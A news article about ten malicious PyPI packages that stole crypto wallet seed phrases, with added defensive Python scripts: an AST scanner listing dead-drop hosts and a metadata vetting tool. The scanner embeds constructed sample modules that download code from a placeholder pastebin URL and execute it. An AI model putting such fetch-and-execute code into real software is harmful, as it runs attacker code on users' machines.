A sophisticated supply chain attack targeting cryptocurrency users has been uncovered in the Python Package Index (PyPI) repository, where ten malicious packages masqueraded as wallet recovery and management utilities. Discovered by cybersecurity researchers at Checkmarx, the campaign specifically targeted users of major cryptocurrency wallets including MetaMask, Trust Wallet, Exodus, Atomic Wallet, Ronin, TronLink, and Phantom. As Bitcoin trades around $60,759 and Ethereum hovers near $2,350, the attack underscores the persistent threats facing crypto holders who rely on open-source software tools.
The Exploit Mechanics
The threat actor paired careful social engineering with code obfuscation. Ten packages were uploaded to PyPI under names chosen to attract developers and users in the cryptocurrency ecosystem (download counts as reported by Checkmarx at the time of discovery): atomicdecoderss (366), trondecoderss (240), phantomdecoderss (449), trustdecoderss (466), exodusdecoderss (422), walletdecoderss (232), ccl-localstoragerss (335), exodushcates (415), cipherbcryptors (450), and ccl_leveldbases (407).
According to Checkmarx researcher Yehuda Gelb, the packages presented themselves as utilities for extracting mnemonic phrases and decrypting wallet data, appearing to offer valuable functionality for cryptocurrency users engaged in wallet recovery or management. However, they harbored hidden functionality designed to steal private keys, mnemonic phrases, transaction histories, and wallet balances.
Six of the ten packages pulled in a dependency named cipherbcryptors that carried the malicious payload, while others relied on an additional package, ccl_leveldbases, to obscure their true purpose. A notable aspect of the operation is that the malicious functionality ran only when particular functions were called, not at installation time, which is the more common pattern for malicious PyPI packages and the point at which most automated scanners look.
Affected Systems
The attack targeted a broad range of cryptocurrency wallets across multiple blockchain ecosystems. Users of Atomic Wallet, Trust Wallet, MetaMask, Ronin, TronLink, Exodus, and Phantom were all in the crosshairs. Each package attracted hundreds of downloads before being identified and removed, roughly 3,800 in total across the ten, so a substantial number of users may have been exposed, although the per-package figures cannot be taken at face value for the reason described next.
The threat actor also manipulated the download statistics displayed on PyPI, giving the packages the false appearance of being popular and widely trusted. Package descriptions included installation instructions, usage examples, and in one case even best practices for virtual environments, all designed to build credibility and reduce suspicion.
The Evasion Strategy
What makes this attack particularly difficult to detect is its use of a dead drop resolver, the technique MITRE ATT&CK catalogues as T1102.001 (Web Service: Dead Drop Resolver). Rather than hard-coding the command-and-control server address in the packages, the malware retrieved it at run time from an external resource. This gives the operator flexibility: the server address can be changed without publishing a package update, and infrastructure can be swapped if a server is taken down, while a static scan of the package itself never sees the real address.
The harvested data, including private keys and mnemonic phrases, was exfiltrated to a remote server controlled by the attacker. A mnemonic phrase is enough to regenerate a wallet's keys, so with it the attacker has full control of the victim's wallet and can drain the funds at any time.
Lessons Learned
This incident highlights several critical security principles for the cryptocurrency community. First, supply chain attacks targeting open-source repositories represent a growing threat vector that requires constant vigilance. The trust placed in package managers like PyPI is being systematically exploited by threat actors who invest significant effort in making malicious packages appear legitimate.
Second, the combination of dead drop resolvers and deferred execution makes detection harder. Security tools that only observe a package's behaviour at installation time (for example, by running setup.py in a sandbox) see nothing when the payload fires only when a specific library function is called; analysis has to cover the package's code paths, not just its install step.
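One way to look for the two evasions described above (a dead drop resolver, and a payload that fires only from inside a function) without executing the package is a static pass over its source. The script below is an added example written for this article; it is not Checkmarx's tooling and contains no code from the malicious packages. It walks the AST, records network calls, decoding, dynamic execution and string literals naming hosts commonly used as dead drops, and notes whether each finding sits at module level (runs on import, and so on install if setup.py imports the module) or inside a function (runs only when called). The host list and the two sample modules are constructed for illustration.

```python
import ast

# Hosts commonly abused as dead-drop resolvers (assumption: an illustrative
# list; extend it from your own threat intel).
DEAD_DROP_HOSTS = ("pastebin.com", "gist.githubusercontent.com",
                   "raw.githubusercontent.com", "api.telegram.org")
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
DECODE_CALLS = {"b64decode", "a85decode", "unhexlify", "decompress"}
EXEC_CALLS = {"exec", "eval", "compile"}


def _callee(node):
    """Bare callee name: 'b64decode' for base64.b64decode(...), 'exec' for exec(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


class Triage(ast.NodeVisitor):
    """Records suspicious calls/strings and whether each sits inside a function."""

    def __init__(self):
        self.scope = []       # enclosing function names; empty means module level
        self.findings = []

    def _record(self, kind, detail, node):
        self.findings.append({
            "kind": kind, "detail": detail, "line": node.lineno,
            # Module-level code runs on import; code inside a function runs only when called.
            "deferred": bool(self.scope),
            "scope": ".".join(self.scope) or "<module>",
        })

    def visit_FunctionDef(self, node):
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            for host in DEAD_DROP_HOSTS:
                if host in node.value:
                    self._record("dead_drop_host", host, node)
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _callee(node)
        if name in EXEC_CALLS:
            self._record("dynamic_exec", name, node)
        elif name in NETWORK_CALLS:
            self._record("network", name, node)
        elif name in DECODE_CALLS:
            self._record("decode", name, node)
        self.generic_visit(node)


def triage_source(source):
    """Parse Python source and return findings in traversal order."""
    visitor = Triage()
    visitor.visit(ast.parse(source))
    return visitor.findings


def verdict(findings):
    kinds = {f["kind"] for f in findings}
    if {"dead_drop_host", "dynamic_exec"} <= kinds:
        risk = "high"      # resolves infrastructure via a web service and runs fetched code
    elif {"network", "dynamic_exec"} <= kinds:
        risk = "medium"    # downloads something and executes dynamic code
    elif kinds:
        risk = "low"
    else:
        risk = "none"
    # True when every suspicious statement is inside a function: an install-time
    # sandbox observes nothing, because nothing runs until the function is called.
    deferred_only = bool(findings) and all(f["deferred"] for f in findings)
    return {"risk": risk, "deferred_only": deferred_only}


# Constructed samples for the demo (not code from the packages in the article).
DEFERRED = '''
import base64
import urllib.request

def decode_wallet(path):
    """Advertised as a recovery helper; nothing below runs until it is called."""
    cfg = urllib.request.urlopen("https://pastebin.com/raw/placeholder").read()
    c2 = base64.b64decode(cfg).decode()
    payload = urllib.request.urlopen(c2).read()
    exec(compile(payload, "<remote>", "exec"))
'''

INSTALL_TIME = '''
import urllib.request
exec(urllib.request.urlopen("https://pastebin.com/raw/placeholder").read())
'''

if __name__ == "__main__":
    for label, src in (("deferred", DEFERRED), ("install-time", INSTALL_TIME)):
        findings = triage_source(src)
        print(label, verdict(findings))
        for f in findings:
            print(f"  line {f['line']}: {f['kind']} ({f['detail']}) in {f['scope']}")
```

Both samples score "high", but only the first reports `deferred_only`, which is exactly the case an install-time sandbox would miss. The host list is a heuristic and will produce false positives on legitimate packages that fetch from GitHub; the point is to surface candidates for a human to read, not to decide on its own.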
Third, the crypto community needs better practices for verifying the authenticity of software tools: checking who maintains a package and how long it has existed, comparing names against established packages to catch typosquatting, reviewing the source code (including that of declared dependencies) where possible, and installing untrusted packages only in a disposable container or virtual machine. A Python virtual environment keeps one project's dependencies separate from another's, but it does not isolate malicious code from the user's files or wallets, so on its own it does not limit the blast radius of a compromised package.
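The checks in the previous paragraph can be partly automated before `pip install` runs. The script below is an added example, not part of the article or of any wallet project: it takes a package's metadata in the shape returned by PyPI's JSON API (https://pypi.org/pypi/NAME/json, a real endpoint) and flags a very new package, a package with only one or two releases, a missing homepage or repository link, a name within a small edit distance of a package on your own allow-list, and declared dependencies that need the same vetting. The allow-list and the two metadata records are constructed for the demo; the live fetch helper is included but not used by the offline run.

```python
import json
import re
import urllib.request
from datetime import datetime, timezone

PYPI_JSON = "https://pypi.org/pypi/{name}/json"   # PyPI's JSON API


def fetch_metadata(name):
    """Live lookup; the offline demo below uses constructed metadata instead."""
    with urllib.request.urlopen(PYPI_JSON.format(name=name), timeout=10) as resp:
        return json.load(resp)


def normalize(name):
    """PEP 503 normalization: lowercase, runs of '-', '_' and '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a, b):
    """Levenshtein distance, used to catch lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _upload_times(meta):
    fmt = "%Y-%m-%dT%H:%M:%S.%fZ"
    return sorted(datetime.strptime(f["upload_time_iso_8601"], fmt).replace(tzinfo=timezone.utc)
                  for files in meta.get("releases", {}).values() for f in files)


def vet(meta, known_good, now=None):
    """Return the normalized name, age in days, red flags and an overall risk level."""
    now = now or datetime.now(timezone.utc)
    info = meta["info"]
    name = normalize(info["name"])
    releases = meta.get("releases", {})
    findings = []

    times = _upload_times(meta)
    age_days = (now - times[0]).days if times else None
    if not times:
        findings.append("no uploaded files")
    elif age_days < 30:
        findings.append(f"first upload is only {age_days} days old")
    if len(releases) <= 2:
        findings.append(f"only {len(releases)} release(s) published")

    urls = info.get("project_urls") or {}
    has_repo = any(k.lower() in ("source", "repository", "homepage") for k in urls)
    if not info.get("home_page") and not has_repo:
        findings.append("no homepage or source repository link")

    for known in known_good:
        d = edit_distance(name, normalize(known))
        if 0 < d <= 2:
            findings.append(f"name is within edit distance {d} of '{normalize(known)}'")

    # In the campaign above the payload lived in a dependency, so vet those too.
    deps = [re.split(r"[\s(<>=!~;\[]", spec, maxsplit=1)[0]
            for spec in info.get("requires_dist") or []]
    if deps:
        findings.append("declares dependencies to vet as well: " + ", ".join(deps))

    typosquat = any("edit distance" in f for f in findings)
    risk = "high" if typosquat or len(findings) >= 3 else "medium" if findings else "low"
    return {"name": name, "age_days": age_days, "findings": findings, "risk": risk}


# Constructed data in the shape of PyPI's JSON API; these are not real package records.
KNOWN_GOOD = ["bip-utils", "mnemonic", "web3", "requests"]   # assumption: your allow-list
DEMO_NOW = datetime(2024, 10, 1, tzinfo=timezone.utc)         # fixed clock for the demo

SUSPECT = {
    "info": {"name": "bip_utilss", "home_page": "", "project_urls": None,
             "summary": "Recover and decode wallet mnemonic phrases",
             "requires_dist": ["cipherbcryptors (>=1.0)"]},
    "releases": {"1.0.0": [{"upload_time_iso_8601": "2024-09-25T10:00:00.000000Z"}],
                 "1.0.1": [{"upload_time_iso_8601": "2024-09-26T10:00:00.000000Z"}]},
}

CLEAN = {
    "info": {"name": "hdwallet-example", "home_page": "",
             "project_urls": {"Source": "https://example.com/hdwallet-example"},
             "summary": "Example HD wallet helpers", "requires_dist": None},
    "releases": {f"0.{i}.0": [{"upload_time_iso_8601": f"2022-{i:02d}-01T00:00:00.000000Z"}]
                 for i in range(1, 13)},
}

if __name__ == "__main__":
    for meta in (SUSPECT, CLEAN):
        print(json.dumps(vet(meta, KNOWN_GOOD, now=DEMO_NOW), indent=2))
```

None of these signals proves a package is malicious, and a patient attacker can age an account and pad a release history; they are cheap filters that would have put every package named in this article in front of a human before it reached a wallet machine. Note that the edit-distance check is only as good as the allow-list you compare against.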
User Action Required
If you have installed any of the ten packages listed above, act immediately. Move your funds to a new wallet whose seed phrase was generated on a clean device; a seed that may have been exfiltrated cannot be made safe again. Remove the packages and scan the system for any secondary payload that may have been installed. Report the incident to the relevant authorities, and consider a hardware wallet for significant holdings. Always check package names carefully before installing, and prefer the official recovery tools published by the wallet developers themselves. With Bitcoin valued at over $60,000, the stakes of poor operational security have never been higher.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding threat mitigation.
466 downloads for trustdecoderss and nobody noticed until Checkmarx flagged it. Supply chain attacks are terrifyingly effective.
Stealing mnemonic phrases through a fake Python package is brutal. Low effort, high reward for the attacker.
Checkmarx found these after 466 downloads of one package. Imagine what hasn't been found yet.
Ten packages with names like trustdecoderss and nobody at PyPI thought to flag the naming pattern. The review process is basically nonexistent.
PyPI has like 500K packages and maybe 5 people reviewing. The scale makes manual review impossible; they need automated heuristics for suspicious names.
pip install should have better warnings for new packages with zero maintainers. This is a platform-level problem, not just user error.
The hardest part is these names look totally reasonable if you are searching for wallet recovery tools. Social engineering at its finest.
The mnemonic phrase exfiltration is the scariest part. Once your seed hits a remote server your wallet is drained in minutes with zero recourse.